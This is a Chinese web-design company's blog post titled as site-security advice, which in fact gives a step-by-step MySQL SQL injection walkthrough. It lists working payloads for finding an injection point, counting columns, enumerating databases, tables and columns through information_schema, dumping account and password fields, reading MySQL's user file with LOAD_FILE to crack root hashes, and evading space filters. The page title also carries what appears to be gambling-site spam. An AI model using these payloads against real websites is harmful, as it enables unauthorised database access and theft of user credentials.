太阳城网址(中国)百度百科

云南网站建设创新企业 昆明多彩网络公司

在线qq:540105663
首页案例展示网站建设域名注册空间主机太阳城网址多彩博客

网站公告

网站建设理念

网站建设常见问题

当前位置: 首页 > 网站建设 > 网站建设理念 > 网站制作安全之mysql注入技巧

网站制作安全之mysql注入技巧

来源:昆明多彩网络公司 日期:2011-09-19 阅读: 发表评论

mysql注入指得是通过程序的漏洞(比如没有过滤),通过执行sql语句进行入侵网站并最终得到服务器权限的行为

 mysql注入大致流程:

1、得到注入点,在页面参数后面加'或者and 1=1和and 1=2测试,如果程序报错或者有一些异常情况(比如执行结果不同)发生则表明该页面有漏洞存在。

2、在参数后面加入 order by 10,10,如果没有什么反应则将后面的10继续增加,如果报错就说明字段数少于该数。

3、暴数据库名,假设当前被注入表的字段数有3个,通过下面两种方式得到

   3.1 union select database(),user(),version()

  3.1 在后面加入 union select 1,SCHEMA_NAME,3 from information_schema.SCHEMATA limit 2,1,将得到数据库名称,第一个数据库为information_schema

4、暴表名,and 1=2 union select 1,table_name,3 from (select * from information_schema.tables where table_schema=0x6861636B)t limit 0,1    0x6861636B为数据库名称转成了16进制,用小葵花工具转换得到,通过上一步可以得到,注意limit前面的t不能省略。

5、暴字段名 and 1=2 union select 1,2,column_name from (select * from information_schema.columns where table_name=0x61646D696E and table_schema=0x6861636B)t limit 0,1;0x61646D696E为表名,table_schema为字段名。

6、union select 1,"字段1","字段2" from "表名" limit 0,1,就可以得到帐户和密码了。

7、其他:得到root的密码通过LOAD_FILE(’C:\..\MYSQL\DATA\MYSQL\USER.MYD’)得到用户的HASH散列,之后用CAIN爆破…如果程序过滤了空格,可以使用/**/相当于空格作用

上一篇:网站建设之设计是种垄断 下一篇:网站制作中chrome(google浏览器)的若干技巧

发表评论评论列表(有 条评论)

我要评论

相关文章:
表单输入和网站安全的几个要点? 阅读:133
网站的安全和防黑客攻击要点 阅读:310
最热文章:
新手怎么制作网页? 阅读:7660
jcarousellite中文文档 阅读:6507
表单元素input、按钮、文字完美垂 阅读:6247
怎么使chrome(谷歌google 阅读:6145
phpMailer中文文档手册 阅读:4639

昆明多彩网络公司,采用DIV+CSS布局,通过W3C标准,做网站中用PHP+MYSQL+AJAX+LINUX搭建昆明网站制作环境,打造安全、高速的昆明网站建设建站平台
公司地址:云南省昆明市五华区大塘路万科城乘峰上9栋105(1楼) 工作时间:周一至周五 9:00-18:00
在线qq:540105663滇ICP备12002795号-1

通过w3c HTML1.0标准通过w3c CSS2.0标准

XML 地图